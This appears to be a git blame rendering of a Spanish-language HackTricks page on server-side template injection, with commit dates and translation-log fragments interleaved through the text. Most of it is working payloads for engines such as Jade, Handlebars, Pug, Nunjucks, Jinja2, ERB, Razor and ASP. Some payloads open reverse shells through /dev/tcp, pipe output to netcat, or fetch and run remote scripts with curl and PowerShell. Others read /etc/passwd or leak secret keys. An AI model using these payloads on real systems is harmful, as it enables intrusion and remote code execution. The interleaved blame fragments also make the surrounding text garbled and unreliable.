											2023-06-05 20:33:24 +02:00
+								}
 								//finish and echo
 								echo $t->finish($t->parse('OUT', 'authors'));
 								?>
 								```
 								### Jade (NodeJS)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
 								Jade, ahora conocido como Pug, es un motor de plantillas de NodeJS que permite la inyección de plantillas en el lado del servidor. Puedes explotar vulnerabilidades de inyección de plantillas en Jade para ejecutar código arbitrario en el servidor.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```javascript
 								- var x = root.process
 								- x = x.mainModule.require
 								- x = x('child_process')
 								= x.exec('id | nc attacker.net 80')
 								```
 								```javascript
 								#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
 								```
 								**Más información**
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
+								* En la sección de Jade de [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen)
 								### patTemplate (PHP)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								> [patTemplate](https://github.com/wernerwa/pat-template) es un motor de plantillas PHP que no compila, el cual utiliza etiquetas XML para dividir un documento en diferentes partes.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```xml
 								<patTemplate:tmpl name="page">
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								This is the main page.
 								<patTemplate:tmpl name="foo">
 								It contains another template.
 								</patTemplate:tmpl>
 								<patTemplate:tmpl name="hello">
 								Hello {NAME}.<br/>
 								</patTemplate:tmpl>
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								</patTemplate:tmpl>
 								```
 								### Handlebars (NodeJS)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Travesía de ruta (más información [aquí](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)).
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```bash
 								curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/'
 								```
 								* \= Error
 								* ${7\*7} = ${7\*7}
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
+								* Nada
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```java
 								{{#with "s" as |string|}}
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								{{#with "e"}}
 								{{#with split as |conslist|}}
 								{{this.pop}}
 								{{this.push (lookup string.sub "constructor")}}
 								{{this.pop}}
 								{{#with string.split as |codelist|}}
 								{{this.pop}}
 								{{this.push "return require('child_process').exec('whoami');"}}
 								{{this.pop}}
 								{{#each conslist}}
 								{{#with (string.sub.apply 0 codelist)}}
 								{{this}}
 								{{/with}}
 								{{/each}}
 								{{/with}}
 								{{/with}}
 								{{/with}}
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								{{/with}}
 								URLencoded:
-												Translated ['pentesting-web/ssti-server-side-template-injection/README.m

											
										
										
											2023-07-11 13:30:02 +00:00
+								%7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%0D%0A%20%20%7B%7B%23with%20%22e%22%7D%7D%0D%0A%20%20%20%20%7B%7B%23with%20split%20as%20%7Cconslist%7C%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epush%20%28lookup%20string%2Esub%20%22constructor%22%29%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%23with%20string%2Esplit%20as%20%7Ccodelist%7C%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epush%20%22return%20require%28%27child%5Fprocess%27%29%2Eexec%28%27whoami%27%29%3B%22%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%23each%20conslist%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%23with%20%28string%2Esub%2Eapply%200%20codelist%29%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%7Bthis%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%2Feach%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%7B%7B%2Fwith%7D%7D%0D%0A%7B%7B%2Fwith%7D%7D
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```
 								**Más información**
 								* [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
 								### JsRender (NodeJS)
 								| **Plantilla** | **Descripción**                         |
 								| ------------ | --------------------------------------- |
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								|              | Evaluar y renderizar la salida              |
 								|              | Evaluar y renderizar la salida codificada en HTML |
 								|              | Comentario                                 |
 								| y          | Permitir código (deshabilitado por defecto)        |
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								* \= 49
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
+								**Lado del Cliente**
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```python
 								{{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}
 								```
 								**Lado del Servidor**
 								```bash
 								{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
 								```
 								**Más información**
 								* [https://appcheck-ng.com/template-injection-jsrender-jsviews/](https://appcheck-ng.com/template-injection-jsrender-jsviews/)
 								### PugJs (NodeJS)
 								* `#{7*7} = 49`
 								* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}`
 								* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}`
-												Translated ['pentesting-web/ssti-server-side-template-injection/README.m

											
										
										
											2023-07-11 13:30:02 +00:00
+								**Ejemplo de renderizado en el servidor**
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```javascript
 								var pugjs = require('pug');
 								home = pugjs.render(injected_page)
 								```
 								**Más información**
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
+								* [https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/](https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								### NUNJUCKS (NodeJS) <a href="#nunjucks" id="nunjucks"></a>
 								* \{{7\*7\}} = 49
 								* \{{foo\}} = Sin salida
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-01-15 10:43:04 +00:00
+								* \#{7\*7} = #{7\*7}
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								* \{{console.log(1)\}} = Error
 								```javascript
 								{{range.constructor("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")()}}
 								{{range.constructor("return global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/10.10.14.11/6767 0>&1\"')")()}}
 								```
 								**Más información**
 								* [http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine](http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine)
 								### ERB (Ruby)
 								* `{{7*7}} = {{7*7}}`
 								* `${7*7} = ${7*7}`
 								* `<%= 7*7 %> = 49`
 								* `<%= foobar %> = Error`
 								```python
 								<%= system("whoami") %> #Execute code
 								<%= Dir.entries('/') %> #List folder
 								<%= File.open('/etc/passwd').read %> #Read file
 								<%= system('cat /etc/passwd') %>
 								<%= `ls /` %>
 								<%= IO.popen('ls /').readlines()  %>
 								<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
 								<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
 								```
 								**Más información**
 								* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby)
 								### Slim (Ruby)
 								* `{ 7 * 7 }`
 								```
 								{ %x|env| }
 								```
 								**Más información**
 								* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby)
 								### Python
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Consulta la siguiente página para aprender trucos sobre **burlar las cajas de arena de ejecución de comandos arbitrarios** en python:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								{% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %}
 								[bypass-python-sandboxes](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/)
 								{% endcontent-ref %}
 								### Tornado (Python)
 								* `{{7*7}} = 49`
 								* `${7*7} = ${7*7}`
 								* `{{foobar}} = Error`
 								* `{{7*'7'}} = 7777777`
 								```python
 								{% raw %}
 								{% import foobar %} = Error
 								{% import os %}
 								{% import os %}
 								{% endraw %}
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-01-10 06:28:19 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-01-14 00:21:24 +00:00
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								{{os.system('whoami')}}
 								{{os.system('whoami')}}
 								```
 								**Más información**
 								### Jinja2 (Python)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								[Sitio web oficial](http://jinja.pocoo.org)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								> Jinja2 es un motor de plantillas completo para Python. Tiene soporte completo para Unicode, un entorno de ejecución en sandbox opcional, ampliamente utilizado y con licencia BSD.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								* `{{7*7}} = Error`
 								* `${7*7} = ${7*7}`
 								* `{{foobar}} Nada`
 								* `{{4*4}}[[5*5]]`
 								* `{{7*'7'}} = 7777777`
 								* `{{config}}`
 								* `{{config.items()}}`
 								* `{{settings.SECRET_KEY}}`
 								* `{{settings}}`
 								* `<div data-gb-custom-block data-tag="debug"></div>`
 								```python
 								{% raw %}
 								{% debug %}
 								{% endraw %}
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-01-10 06:28:19 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-01-14 00:21:24 +00:00
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								{{settings.SECRET_KEY}}
 								{{4*4}}[[5*5]]
 								{{7*'7'}} would result in 7777777
 								```
 								**Jinja2 - Formato de plantilla**
 								```python
 								{% raw %}
 								{% extends "layout.html" %}
 								{% block body %}
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								<ul>
 								{% for user in users %}
 								<li><a href="{{ user.url }}">{{ user.username }}</a></li>
 								{% endfor %}
 								</ul>
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								{% endblock %}
 								{% endraw %}
 								```
 								[**RCE no dependiente de**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__`:
 								```python
 								{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
 								{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
 								{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
 								# Or in the shotest versions:
 								{{ cycler.__init__.__globals__.os.popen('id').read() }}
 								{{ joiner.__init__.__globals__.os.popen('id').read() }}
 								{{ namespace.__init__.__globals__.os.popen('id').read() }}
 								```
 								**Más detalles sobre cómo abusar de Jinja**:
 								{% content-ref url="jinja2-ssti.md" %}
 								[jinja2-ssti.md](jinja2-ssti.md)
 								{% endcontent-ref %}
 								### Mako (Python)
 								```python
 								<%
 								import os
 								x=os.popen('id').read()
 								%>
 								${x}
 								```
 								### Razor (.Net)
 								* `@(2+2) <= Éxito`
 								* `@() <= Éxito`
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* `@("{{código}}") <= Éxito`
 								* `@ <= Éxito`
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								* `@{} <= ¡ERROR!`
 								* `@{ <= ¡ERROR!`
 								* `@(1+2)`
-												Translated ['pentesting-web/ssti-server-side-template-injection/README.m

											
										
										
											2024-01-10 22:20:21 +00:00
+								* `@( //Código C# )`
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								* `@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");`
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								*   `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4MQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbw3AHMAXABUAGEAcwBrAHMAXAB0AGUAcw0AG0AZQB0ADYANAAuAGUAeABlAA==");`
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								El método `System.Diagnostics.Process.Start` de .NET se puede utilizar para iniciar cualquier proceso en el servidor y así crear un webshell. Puedes encontrar un ejemplo de una aplicación web vulnerable en [https://github.com/cnotin/RazorVulnerableApp](https://github.com/cnotin/RazorVulnerableApp)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								**Más información**
 								* [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-\(SSTI\)-in-ASP.NET-Razor/)
 								* [https://www.schtech.co.uk/razor-pages-ssti-rce/](https://www.schtech.co.uk/razor-pages-ssti-rce/)
 								### ASP
 								* `<%= 7*7 %>` = 49
 								* `<%= "foo" %>` = foo
 								* `<%= foo %>` = Nada
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* `<%= response.write(date()) %>` = \<Date>
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```bash
 								<%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								**Más Información**
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* [https://www.w3schools.com/asp/asp\_examples.asp](https://www.w3schools.com/asp/asp\_examples.asp)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								### Mojolicious (Perl)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Incluso si es perl, utiliza etiquetas como ERB en Ruby.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								* `<%= 7*7 %> = 49`
 								* `<%= foobar %> = Error`
 								```
 								<%= perl code %>
 								<% perl code %>
 								```
 								### SSTI en GO
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								La forma de confirmar que el motor de plantillas utilizado en el backend es Go es mediante el uso de estos payloads:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-01-14 00:21:24 +00:00
+								* `{{ . }}` = estructura de datos pasada como entrada a la plantilla
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* Si los datos pasados son un objeto que contiene el atributo Password por ejemplo, el payload anterior lo filtraría, pero también podrías hacer: `{{ .Password }}`
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								* `{{printf "%s" "ssti" }}` = debería mostrar la cadena ssti en la respuesta
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* `{{html "ssti"}}`, `{{js "ssti"}}` = Estos son algunos otros payloads que deberían mostrar la cadena "ssti" sin las palabras finales "js" o "html". Puedes consultar más palabras clave en el motor [aquí](https://golang.org/pkg/text/template).
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								**Explotación de XSS**
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Si el servidor está **utilizando el paquete text/template**, XSS es muy fácil de lograr simplemente proporcionando tu **payload** como entrada. Sin embargo, eso **no es el caso con html/template** ya que codifica en HTML la respuesta: `{{"<script>alert(1)</script>"}}` --> `&lt;script&gt;alert(1)&lt;/script&gt;`
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Sin embargo, Go permite **DEFINIR** una **plantilla** completa y luego **llamarla más tarde**. El payload sería algo así:\
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								`{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}}`
 								**Explotación de RCE**
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								La documentación tanto para el módulo html/template se puede encontrar [aquí](https://golang.org/pkg/html/template/), y la documentación para el módulo text/template se puede encontrar [aquí](https://golang.org/pkg/text/template/), y sí, varían mucho. Por ejemplo, en **text/template**, puedes **llamar directamente a cualquier función pública con el valor "call"**, sin embargo, esto no es posible con html/template.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								Si deseas encontrar una RCE en Go a través de SSTI, debes saber que al poder acceder al objeto dado a la plantilla con `{{ . }}`, también puedes **llamar a los métodos de los objetos**. Entonces, imagina que el **objeto pasado tiene un método llamado System** que ejecuta el comando dado, podrías abusar de él con: `{{ .System "ls" }}`\
 								Por lo tanto, probablemente **necesitarás el código fuente**. Un código fuente potencial para algo así se vería así:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								```go
 								func (p Person) Secret (test string) string {
-												Translated ['README.md', 'macos-hardening/macos-red-teaming/README.md',

											
										
										
											2023-06-25 23:32:46 +00:00
+								out, _ := exec.Command(test).CombinedOutput()
 								return string(out)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								}
 								```
 								**Más información**
 								* [https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html](https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html)
 								* [https://www.onsecurity.io/blog/go-ssti-method-research/](https://www.onsecurity.io/blog/go-ssti-method-research/)
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								### Más exploits
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-01-14 00:21:24 +00:00
+								Consulta el resto de [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) para más exploits. También puedes encontrar información interesante sobre etiquetas en [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['pentesting-web/ssti-server-side-template-injection/README.m

											
										
										
											2024-01-10 22:20:21 +00:00
+								## BlackHat PDF
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								{% file src="../../.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf" %}
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								## Ayuda relacionada
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['pentesting-web/ssti-server-side-template-injection/README.m

											
										
										
											2023-07-11 13:30:02 +00:00
+								Si crees que podría ser útil, lee:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								* [Trucos de Flask](../../network-services-pentesting/pentesting-web/flask.md)
 								* [Funciones mágicas de Python](broken-reference/)
 								## Herramientas
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
+								{% embed url="https://github.com/Hackmanit/TInjA" %}
-												Translated ['pentesting-web/ssti-server-side-template-injection/README.m

											
										
										
											2024-01-10 22:20:21 +00:00
+								{% embed url="https://github.com/vladko312/sstimap" %}
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
+								{% embed url="https://github.com/epinna/tplmap" %}
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
+								{% embed url="https://github.com/Hackmanit/template-injection-table" %}
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								## Lista de detección de fuerza bruta
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								## Práctica y referencias
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								* [https://portswigger.net/web-security/server-side-template-injection/exploiting](https://portswigger.net/web-security/server-side-template-injection/exploiting)
 								* [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
 								* [**https://portswigger.net/web-security/server-side-template-injection**](https://portswigger.net/web-security/server-side-template-injection)
 								<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								[**RootedCON**](https://www.rootedcon.com/) es el evento de ciberseguridad más relevante en **España** y uno de los más importantes en **Europa**. Con **la misión de promover el conocimiento técnico**, este congreso es un punto de encuentro clave para profesionales de la tecnología y la ciberseguridad en todas las disciplinas.
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								{% embed url="https://www.rootedcon.com/" %}
 								<details>
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								<summary><strong>Aprende hacking en AWS desde cero hasta experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 19:46:19 +00:00
 								Otras formas de apoyar a HackTricks:
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:44:49 +00:00
+								* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
 								* Obtén el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
 								* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
 								* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
 								* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
-												f

											
										
										
											2023-06-05 20:33:24 +02:00
 								</details>